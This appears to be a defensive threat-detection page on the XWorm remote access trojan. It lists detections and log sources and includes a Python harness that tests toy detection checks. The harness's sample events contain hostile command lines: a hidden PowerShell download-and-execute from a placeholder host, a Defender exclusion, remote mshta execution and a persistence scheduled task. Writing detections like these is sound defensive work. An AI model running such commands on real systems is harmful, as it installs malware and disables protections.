Analytics Story: XWorm

Description

Leverage searches that allow you to detect and investigate unusual activities that might relate to the presence of the XWorm remote access trojan (RAT). XWorm is a sophisticated and stealthy malware variant often used in data theft operations. Its capabilities include keylogging, screen capturing, remote desktop control, and data exfiltration, all of which can operate undetected. By utilizing advanced search queries and behavioral analytics, you can uncover anomalies such as unauthorized remote connections, unusual process behavior, or unexpected outbound traffic patterns. These indicators often signal the early stages of compromise, enabling rapid response before significant damage occurs. Implementing detection rules and correlating threat intelligence with system logs further enhances your ability to pinpoint XWorm activity.

Why it matters

XWorm emerged on the cybercrime scene around 2022 as a commercial Remote Access Trojan (RAT) advertised on underground forums. Originally marketed as a cheap but effective alternative to more established RATs, it quickly gained popularity due to its rich feature set, modular design, and ease of use. Over time, the developers behind XWorm have continuously updated the malware to bypass detection and expand its capabilities, making it a favorite among low- to mid-tier threat actors and ransomware affiliates. XWorm is capable of full remote desktop access, keylogging, clipboard monitoring, webcam hijacking, file theft, and command execution. It also includes features for persistence, anti-analysis, and sandbox evasion. Often delivered through phishing emails or maldocs, it can be used both for espionage and as a precursor to ransomware deployment. Its adaptability and low cost have ensured its continued presence in the threat landscape.

Detections

Name | Technique | Type
Add or Set Windows Defender Exclusion | Disable or Modify Tools | TTP
Any Powershell DownloadFile | PowerShell, Ingress Tool Transfer | TTP
Any Powershell DownloadString | PowerShell, Ingress Tool Transfer | TTP
Detect mshta inline hta execution | Mshta | TTP
Detect MSHTA Url in Command Line | Mshta | TTP
Malicious PowerShell Process - Execution Policy Bypass | PowerShell | Anomaly
PowerShell 4104 Hunting | PowerShell | Hunting
Powershell Fileless Script Contains Base64 Encoded Content | Obfuscated Files or Information, PowerShell | TTP
Powershell Processing Stream Of Data | PowerShell | TTP
Recon AVProduct Through Pwh or WMI | Gather Victim Host Information | TTP
Registry Keys Used For Persistence | Registry Run Keys / Startup Folder | TTP
Scheduled Task Deleted Or Created via CMD | Scheduled Task | TTP
Suspicious Scheduled Task from Public Directory | Scheduled Task | Anomaly
Windows Boot or Logon Autostart Execution In Startup Folder | Registry Run Keys / Startup Folder | Anomaly
Windows Defender Exclusion Registry Entry | Disable or Modify Tools | TTP
Windows Hijack Execution Flow Version Dll Side Load | DLL | Anomaly
Windows MSHTA Writing to World Writable Path | Mshta | TTP
Windows Powershell Cryptography Namespace | PowerShell | Anomaly
Windows Process Execution From ProgramData | Match Legitimate Resource Name or Location | Anomaly
Windows Process Execution in Temp Dir | Create or Modify System Process, Match Legitimate Resource Name or Location | Anomaly
Windows Renamed Powershell Execution | Rename Legitimate Utilities | TTP
Windows Scheduled Task with Highest Privileges | Scheduled Task | TTP
Windows Suspicious Process File Path | Create or Modify System Process, Match Legitimate Resource Name or Location | TTP
Windows System LogOff Commandline | System Shutdown/Reboot | Anomaly
Windows System Reboot CommandLine | System Shutdown/Reboot | Anomaly
Windows System Shutdown CommandLine | System Shutdown/Reboot | Anomaly
Windows Unsigned DLL Side-Loading In Same Process Path | DLL | TTP
Windows Unsigned MS DLL Side-Loading | DLL, Boot or Logon Autostart Execution | Anomaly
Windows User Execution Malicious URL Shortcut File | Malicious File | Anomaly
WinEvent Scheduled Task Created Within Public Path | Scheduled Task | TTP
Wscript Or Cscript Suspicious Child Process | Process Injection, Parent PID Spoofing, Create or Modify System Process | TTP
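To make the detection logic behind a few of the rows above concrete, here is an added example that is not part of the analytics story or of the Splunk Security Content project: a small Python harness that re-implements seven of the listed detections as checks over process-creation records and runs them against constructed sample events. The field names (process_name, process_path, parent_process_name, original_file_name, cmdline) are an assumption that mirrors the normalised process fields a SIEM would expose from Sysmon EventID 1 or Security 4688, and the sample command lines, paths and the example.invalid host are constructed for the test, not indicators from the page. The path list and child-process list are simplifications of the Splunk searches, not their exact contents.

```python
"""Toy re-implementation of selected XWorm analytics-story detections.

Added example; not the Splunk Security Content searches themselves. Each
check returns True when a process-creation record matches the behaviour the
named detection looks for. Field names are assumed (see lead-in).
"""
import re

# Directories the "Process Execution From ProgramData / in Temp Dir /
# Suspicious Process File Path" detections treat as unusual for an executable
# (simplified list, lower-case, with a trailing backslash).
SUSPICIOUS_PATHS = (
    "\\programdata\\", "\\users\\public\\", "\\windows\\temp\\",
    "\\appdata\\local\\temp\\", "\\perflogs\\", "\\$recycle.bin\\",
)
PS_NAMES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Children of wscript/cscript that the script-host detection flags (subset).
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                       "regsvr32.exe", "rundll32.exe", "certutil.exe",
                       "schtasks.exe"}


def defender_exclusion(ev):
    """Add-/Set-MpPreference with any -Exclusion* parameter."""
    c = ev["cmdline"].lower()
    return ("add-mppreference" in c or "set-mppreference" in c) and "-exclusion" in c


def powershell_download(ev):
    """PowerShell command line using WebClient DownloadString/DownloadFile."""
    c = ev["cmdline"].lower()
    return ev["process_name"].lower() in PS_NAMES and (
        "downloadstring" in c or "downloadfile" in c)


def mshta_url(ev):
    """mshta.exe launched with a URL on its command line."""
    return (ev["process_name"].lower() == "mshta.exe"
            and re.search(r"https?://", ev["cmdline"], re.I) is not None)


def renamed_powershell(ev):
    """Binary whose PE OriginalFileName is PowerShell's but whose name is not."""
    orig = ev.get("original_file_name", "").lower()
    return orig in ("powershell.exe", "pwsh.dll") and ev["process_name"].lower() not in PS_NAMES


def suspicious_path(ev):
    """Executable image located under a world-writable or temp directory."""
    p = ev["process_path"].lower()
    return any(s in p for s in SUSPICIOUS_PATHS)


def public_scheduled_task(ev):
    """schtasks /create whose action points into a public/temp directory."""
    c = ev["cmdline"].lower()
    return (ev["process_name"].lower() == "schtasks.exe" and "/create" in c
            and any(s in c for s in SUSPICIOUS_PATHS))


def script_host_child(ev):
    """wscript.exe or cscript.exe spawning an interpreter or LOLBin."""
    return (ev["parent_process_name"].lower() in ("wscript.exe", "cscript.exe")
            and ev["process_name"].lower() in SUSPICIOUS_CHILDREN)


# Detection names taken from the table above, mapped to the toy checks.
DETECTIONS = {
    "Add or Set Windows Defender Exclusion": defender_exclusion,
    "Any Powershell DownloadString / DownloadFile": powershell_download,
    "Detect MSHTA Url in Command Line": mshta_url,
    "Windows Renamed Powershell Execution": renamed_powershell,
    "Windows Suspicious Process File Path": suspicious_path,
    "Suspicious Scheduled Task from Public Directory": public_scheduled_task,
    "Wscript Or Cscript Suspicious Child Process": script_host_child,
}


def evaluate(ev):
    """Return the names of every detection the record triggers, in table order."""
    return [name for name, check in DETECTIONS.items() if check(ev)]


def run(events):
    """Evaluate a batch of records; result maps event id to triggered names."""
    return {ev["id"]: evaluate(ev) for ev in events}


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "benign-1", "parent_process_name": "explorer.exe", "process_name": "notepad.exe",
     "process_path": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"id": "ps-download", "parent_process_name": "wscript.exe", "process_name": "powershell.exe",
     "process_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"id": "defender-excl", "parent_process_name": "cmd.exe", "process_name": "powershell.exe",
     "process_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\Users\\Public'\""},
    {"id": "mshta-url", "parent_process_name": "cmd.exe", "process_name": "mshta.exe",
     "process_path": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://example.invalid/p.hta"},
    {"id": "renamed-ps", "parent_process_name": "explorer.exe", "process_name": "svc.exe",
     "process_path": r"C:\ProgramData\svc.exe", "original_file_name": "PowerShell.EXE", "cmdline": "svc.exe -enc AAAA"},
    {"id": "public-task", "parent_process_name": "cmd.exe", "process_name": "schtasks.exe",
     "process_path": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "OneDrive Update" /tr "C:\Users\Public\Libraries\update.exe" /sc minute /mo 5'},
]

if __name__ == "__main__":
    for event_id, hits in run(SAMPLE_EVENTS).items():
        print(f"{event_id}: {hits or 'no detections'}")
```

The benign record produces no hits, while the constructed records each trip one or two of the named detections; in a real deployment the same checks would be expressed as SPL over the data sources listed below, where the Type column (TTP versus Anomaly) indicates how much independent corroboration a hit needs before it is treated as an incident.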

Data Sources

Name | Platform | Sourcetype | Source
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike
Powershell Script Block Logging 4104 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 7 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log Security 4698 | Windows | xmlwineventlog | XmlWinEventLog:Security

References


Source: GitHub | Version: 1